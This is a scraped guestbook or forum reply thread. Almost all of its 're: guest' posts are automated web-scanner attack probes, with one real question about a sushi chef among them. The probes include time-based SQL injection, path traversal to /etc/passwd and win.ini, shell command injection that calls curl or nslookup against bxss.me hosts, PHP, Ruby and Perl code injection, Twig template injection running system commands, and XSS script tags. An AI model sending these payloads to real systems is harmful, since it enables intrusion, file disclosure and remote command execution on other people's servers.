@@93nsv
re: guest
13BKRHIYE0
re: guest
response.write(9016941*9895687)
re: guest
'+response.write(9016941*9895687)+'
re: guest
"+response.write(9016941*9895687)+"
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
${9999689+9999607}
re: guest
../
re: guest
)
re: guest
!(()&&!|*|*|
re: guest
^(#$!@#$)(()))******
re: guest
redirtest.acx
re: guest
echo nctbuo$()\ evyrac\nz^xyu||a #' &echo nctbuo$()\ evyrac\nz^xyu||a #|" &echo nctbuo$()\ evyrac\nz^xyu||a #
re: guest
&echo zihjmg$()\ sapvvz\nz^xyu||a #' &echo zihjmg$()\ sapvvz\nz^xyu||a #|" &echo zihjmg$()\ sapvvz\nz^xyu||a #
re: guest
ctime
sleep
p0
(I30
tp1
Rp2
.
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: guest
|echo rjnasg$()\ ctsczt\nz^xyu||a #' |echo rjnasg$()\ ctsczt\nz^xyu||a #|" |echo rjnasg$()\ ctsczt\nz^xyu||a #
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: guest
expr 9000132460 - 935480
re: guest
/etc/shells
re: guest
(nslookup -q=cname hitkgxqsixxpqb1b5d.bxss.me||curl hitkgxqsixxpqb1b5d.bxss.me))
re: guest
'.gethostbyname(lc('hitfm'.'vvlbnkuqac940.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(87).chr(114).chr(66).'
re: guest
../../../../../../../../../../../../../../etc/shells
re: guest
$(nslookup -q=cname hithstityifsq935fd.bxss.me||curl hithstityifsq935fd.bxss.me)
re: guest
c:/windows/win.ini
re: guest
&nslookup -q=cname hitcwrcocjkld24600.bxss.me&'\"`0&nslookup -q=cname hitcwrcocjkld24600.bxss.me&`'
re: guest
".gethostbyname(lc("hitnc"."erzcjefjec38b.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(87).chr(114).chr(72)."
re: guest
bxss.me
re: guest
&(nslookup -q=cname hitzngwezwudcc8960.bxss.me||curl hitzngwezwudcc8960.bxss.me)&'\"`0&(nslookup -q=cname hitzngwezwudcc8960.bxss.me||curl hitzngwezwudcc8960.bxss.me)&`'
re: guest
gethostbyname(lc('hitny'.'fsegkiurb7e4e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(80).chr(119).chr(78)
re: guest
Http://bxss.me/t/fit.txt
re: guest
http://bxss.me/t/fit.txt?.jpg
re: guest
|(nslookup -q=cname hitwupizmsgpb26cef.bxss.me||curl hitwupizmsgpb26cef.bxss.me)
re: guest
`(nslookup -q=cname hiteyottsjqdna7f87.bxss.me||curl hiteyottsjqdna7f87.bxss.me)`
re: guest
;(nslookup -q=cname hitsnzsoviswy986f0.bxss.me||curl hitsnzsoviswy986f0.bxss.me)|(nslookup -q=cname hitsnzsoviswy986f0.bxss.me||curl hitsnzsoviswy986f0.bxss.me)&(nslookup -q=cname hitsnzsoviswy986f0.bxss.me||curl hitsnzsoviswy986f0.bxss.me)
re: guest
|(nslookup${IFS}-q${IFS}cname${IFS}hitcntbbzowdrbd7e9.bxss.me||curl${IFS}hitcntbbzowdrbd7e9.bxss.me)
re: guest
&(nslookup${IFS}-q${IFS}cname${IFS}hitvdppvptskw5f499.bxss.me||curl${IFS}hitvdppvptskw5f499.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitvdppvptskw5f499.bxss.me||curl${IFS}hitvdppvptskw5f499.bxss.me)&`'
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
';print(md5(31337));$a='
re: guest
bxss.me/t/xss.html?%00
re: guest
";print(md5(31337));$a="
re: guest
'"()
re: guest
${@print(md5(31337))}
re: guest
'&&sleep(27*1000)*mobygn&&'
re: guest
${@print(md5(31337))}\
re: guest
"&&sleep(27*1000)*bfaqgn&&"
re: guest
'.print(md5(31337)).'
re: guest
"+"A".concat(70-3).concat(22*4).concat(117).concat(90).concat(113).concat(65)+(require"socket"
Socket.gethostbyname("hityj"+"ypipiemh49ac2.bxss.me.")[3].to_s)+"
re: guest
'||sleep(27*1000)*kbagba||'
re: guest
'+'A'.concat(70-3).concat(22*4).concat(121).concat(87).concat(121).concat(77)+(require'socket'
Socket.gethostbyname('hitly'+'fljtwepl020dd.bxss.me.')[3].to_s)+'
re: guest
"||sleep(27*1000)*eupjnp||"
re: guest
'A'.concat(70-3).concat(22*4).concat(107).concat(70).concat(100).concat(81)+(require'socket'
Socket.gethostbyname('hitvd'+'zkqncppkb70c4.bxss.me.')[3].to_s)
re: guest
'"
re: guest
<!--
re: guest
replies
re: guest
replies�
re: guest
replies/.
re: guest
'"()&%<zzz><ScRiPt >OFxK(9183)</ScRiPt>
re: guest
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hituyjixbggagd6289.bxss.me")}}
re: guest
'"()&%<zzz><ScRiPt >OFxK(9275)</ScRiPt>
re: guest
9138568
re: guest
opegCNHT
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
-1 OR 5*5=25 --
re: guest
-1 OR 5*5=26 --
re: guest
-1 OR 5*5=25
re: guest
-1 OR 5*5=26
re: guest
*if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
-1 waitfor delay '0:0:15' --
re: guest
WsM9mETX'; waitfor delay '0:0:15' --
re: guest
-1 OR 395=(SELECT 395 FROM PG_SLEEP(15))--
re: guest
-1) OR 138=(SELECT 138 FROM PG_SLEEP(15))--
re: guest
-1)) OR 518=(SELECT 518 FROM PG_SLEEP(15))--
re: guest
vYvEGvhR' OR 43=(SELECT 43 FROM PG_SLEEP(15))--
re: guest
hlsw6tZw') OR 347=(SELECT 347 FROM PG_SLEEP(15))--
re: guest
p4MNcIdQ')) OR 653=(SELECT 653 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
'"
re: guest
@@FxfL0
re: guest
(select 198766*667891)
re: guest
(select 198766*667891 from DUAL)
Hi! Have anyone visited Obana recently?
Heard a lot of good things about his neta but I would like to know his shari style. Thanks!
re: guest
1Cixklg6N4O
re: guest
response.write(9324373*9590798)
re: guest
'+response.write(9324373*9590798)+'
re: guest
"+response.write(9324373*9590798)+"
re: guest
%0abcc:074625.67-22375.67.689cd.19990.2@bxss.me
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
to@example.com>%0d%0abcc:074625.67-22376.67.689cd.19990.2@bxss.me
re: guest
${10000474+9999683}
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
echo ycdcye$()\ jtpaml\nz^xyu||a #' &echo ycdcye$()\ jtpaml\nz^xyu||a #|" &echo ycdcye$()\ jtpaml\nz^xyu||a #
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
&echo rqgnnk$()\ cthivv\nz^xyu||a #' &echo rqgnnk$()\ cthivv\nz^xyu||a #|" &echo rqgnnk$()\ cthivv\nz^xyu||a #
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
|echo gzhkeb$()\ vhmglm\nz^xyu||a #' |echo gzhkeb$()\ vhmglm\nz^xyu||a #|" |echo gzhkeb$()\ vhmglm\nz^xyu||a #
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
(nslookup hitfoishiibpc97eaf.bxss.me||perl -e "gethostbyname('hitfoishiibpc97eaf.bxss.me')")
re: guest
/etc/passwd
re: guest
$(nslookup hitiuhldbsqsz182bf.bxss.me||perl -e "gethostbyname('hitiuhldbsqsz182bf.bxss.me')")
re: guest
%2fetc%2fpasswd
re: guest
&nslookup hitqvyrgsrzmn800bf.bxss.me&'\"`0&nslookup hitqvyrgsrzmn800bf.bxss.me&`'
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
&(nslookup hithpyomyiqxbea885.bxss.me||perl -e "gethostbyname('hithpyomyiqxbea885.bxss.me')")&'\"`0&(nslookup hithpyomyiqxbea885.bxss.me||perl -e "gethostbyname('hithpyomyiqxbea885.bxss.me')")&`'
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
|(nslookup hitqkplaamjbz178d7.bxss.me||perl -e "gethostbyname('hitqkplaamjbz178d7.bxss.me')")
re: guest
Http://bxss.me/t/fit.txt
re: guest
`(nslookup hitnfqepozrbsfc4e3.bxss.me||perl -e "gethostbyname('hitnfqepozrbsfc4e3.bxss.me')")`
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
;(nslookup hitljwsbwnatobf0f9.bxss.me||perl -e "gethostbyname('hitljwsbwnatobf0f9.bxss.me')")|(nslookup hitljwsbwnatobf0f9.bxss.me||perl -e "gethostbyname('hitljwsbwnatobf0f9.bxss.me')")&(nslookup hitljwsbwnatobf0f9.bxss.me||perl -e "gethostbyname('hitljwsbwnatobf0f9.bxss.me')")
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
/etc/shells
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
file:///etc/passwd
re: guest
c:/windows/win.ini
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
bxss.me
re: guest
/WEB-INF/web.xml
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
/../../../../../../../../../../boot.ini
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
WEB-INF/web.xml
re: guest
WEB-INF\web.xml
re: guest
'.gethostbyname(lc('hithe'.'hrztcyxsb2335.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(71).chr(115).chr(76).'
re: guest
)
re: guest
".gethostbyname(lc("hitcw"."yguqqxbq7ba22.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(79).chr(121).chr(68)."
re: guest
!(()&&!|*|*|
re: guest
^(#$!@#$)(()))******
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
"+"A".concat(70-3).concat(22*4).concat(116).concat(71).concat(97).concat(76)+(require"socket"
Socket.gethostbyname("hitji"+"utsemjymefdb6.bxss.me.")[3].to_s)+"
re: guest
bxss.me/t/xss.html?%00
re: guest
'+'A'.concat(70-3).concat(22*4).concat(122).concat(84).concat(113).concat(81)+(require'socket'
Socket.gethostbyname('hitaa'+'zmjfrwtu503e4.bxss.me.')[3].to_s)+'
re: guest
'"
re: guest
<!--
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
';print(md5(31337));$a='
re: guest
";print(md5(31337));$a="
re: guest
${@print(md5(31337))}
re: guest
${@print(md5(31337))}\
re: guest
'.print(md5(31337)).'
re: guest
1VQ879VI30
re: guest
response.write(9007001*9884026)
re: guest
'+response.write(9007001*9884026)+'
re: guest
"+response.write(9007001*9884026)+"
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
file:///etc/passwd
re: guest
${10000426+9999961}
re: guest
../
re: guest
)
re: guest
!(()&&!|*|*|
re: guest
^(#$!@#$)(()))******
re: guest
redirtest.acx
re: guest
ctime
sleep
p0
(I30
tp1
Rp2
.
re: guest
echo cngbgj$()\ xmoege\nz^xyu||a #' &echo cngbgj$()\ xmoege\nz^xyu||a #|" &echo cngbgj$()\ xmoege\nz^xyu||a #
re: guest
'.gethostbyname(lc('hitsy'.'lkzvouza77d46.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(80).chr(121).chr(69).'
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: guest
&echo gnwnfs$()\ yiifji\nz^xyu||a #' &echo gnwnfs$()\ yiifji\nz^xyu||a #|" &echo gnwnfs$()\ yiifji\nz^xyu||a #
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: guest
".gethostbyname(lc("hitmo"."rwtnciitbb4b1.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(74).chr(120).chr(82)."
re: guest
|echo qhuboa$()\ gqttky\nz^xyu||a #' |echo qhuboa$()\ gqttky\nz^xyu||a #|" |echo qhuboa$()\ gqttky\nz^xyu||a #
re: guest
/etc/shells
re: guest
gethostbyname(lc('hitzp'.'njjuutaic503b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(77).chr(100).chr(83)
re: guest
expr 9000176290 - 921596
re: guest
../../../../../../../../../../../../../../etc/shells
re: guest
(nslookup -q=cname hitiikrsofuug3470c.bxss.me||curl hitiikrsofuug3470c.bxss.me))
re: guest
c:/windows/win.ini
re: guest
$(nslookup -q=cname hitutywawifyyf0505.bxss.me||curl hitutywawifyyf0505.bxss.me)
re: guest
bxss.me
re: guest
&nslookup -q=cname hitihjbuwpkdv5bbe3.bxss.me&'\"`0&nslookup -q=cname hitihjbuwpkdv5bbe3.bxss.me&`'
re: guest
Http://bxss.me/t/fit.txt
re: guest
&(nslookup -q=cname hitmdcpcbbfba3f5be.bxss.me||curl hitmdcpcbbfba3f5be.bxss.me)&'\"`0&(nslookup -q=cname hitmdcpcbbfba3f5be.bxss.me||curl hitmdcpcbbfba3f5be.bxss.me)&`'
re: guest
http://bxss.me/t/fit.txt?.jpg
re: guest
|(nslookup -q=cname hitzdwstpyyur5f741.bxss.me||curl hitzdwstpyyur5f741.bxss.me)
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
`(nslookup -q=cname hitbforqxwekzad436.bxss.me||curl hitbforqxwekzad436.bxss.me)`
re: guest
bxss.me/t/xss.html?%00
re: guest
;(nslookup -q=cname hiteeodkhpcmycf36f.bxss.me||curl hiteeodkhpcmycf36f.bxss.me)|(nslookup -q=cname hiteeodkhpcmycf36f.bxss.me||curl hiteeodkhpcmycf36f.bxss.me)&(nslookup -q=cname hiteeodkhpcmycf36f.bxss.me||curl hiteeodkhpcmycf36f.bxss.me)
re: guest
|(nslookup${IFS}-q${IFS}cname${IFS}hithvrzkpwsub8fe72.bxss.me||curl${IFS}hithvrzkpwsub8fe72.bxss.me)
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
';print(md5(31337));$a='
re: guest
&(nslookup${IFS}-q${IFS}cname${IFS}hitgwahhzndlid5eff.bxss.me||curl${IFS}hitgwahhzndlid5eff.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitgwahhzndlid5eff.bxss.me||curl${IFS}hitgwahhzndlid5eff.bxss.me)&`'
re: guest
";print(md5(31337));$a="
re: guest
"+"A".concat(70-3).concat(22*4).concat(106).concat(67).concat(100).concat(67)+(require"socket"
Socket.gethostbyname("hitdg"+"vtbtbnytb478d.bxss.me.")[3].to_s)+"
re: guest
'"()
re: guest
${@print(md5(31337))}
re: guest
'+'A'.concat(70-3).concat(22*4).concat(99).concat(70).concat(105).concat(66)+(require'socket'
Socket.gethostbyname('hitmd'+'nvdfrlrxf67d8.bxss.me.')[3].to_s)+'
re: guest
'&&sleep(27*1000)*pcxbtr&&'
re: guest
${@print(md5(31337))}\
re: guest
'A'.concat(70-3).concat(22*4).concat(101).concat(87).concat(100).concat(72)+(require'socket'
Socket.gethostbyname('hitkc'+'fnjgogiwe1740.bxss.me.')[3].to_s)
re: guest
"&&sleep(27*1000)*xyhkbg&&"
re: guest
'.print(md5(31337)).'
re: guest
'||sleep(27*1000)*wrbsve||'
re: guest
"||sleep(27*1000)*ijfhzu||"
re: guest
replies
re: guest
replies�
re: guest
'"
re: guest
replies/.
re: guest
<!--
re: guest
'"()&%<zzz><ScRiPt >6ug0(9053)</ScRiPt>
re: guest
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitwceqkaigql05557.bxss.me")}}
re: guest
'"()&%<zzz><ScRiPt >6ug0(9009)</ScRiPt>
re: guest
9536433
re: guest
aEfFCalx
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
-1 OR 5*5=25 --
re: guest
-1 OR 5*5=26 --
re: guest
-1 OR 5*5=25
re: guest
-1 OR 5*5=26
re: guest
*if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
-1 waitfor delay '0:0:15' --
re: guest
kGhjapKy'; waitfor delay '0:0:15' --
re: guest
-1 OR 11=(SELECT 11 FROM PG_SLEEP(15))--
re: guest
-1) OR 526=(SELECT 526 FROM PG_SLEEP(15))--
re: guest
-1)) OR 544=(SELECT 544 FROM PG_SLEEP(15))--
re: guest
p4qkDitN' OR 582=(SELECT 582 FROM PG_SLEEP(15))--
re: guest
irpMhIb2') OR 848=(SELECT 848 FROM PG_SLEEP(15))--
re: guest
0OmvmO6O')) OR 921=(SELECT 921 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
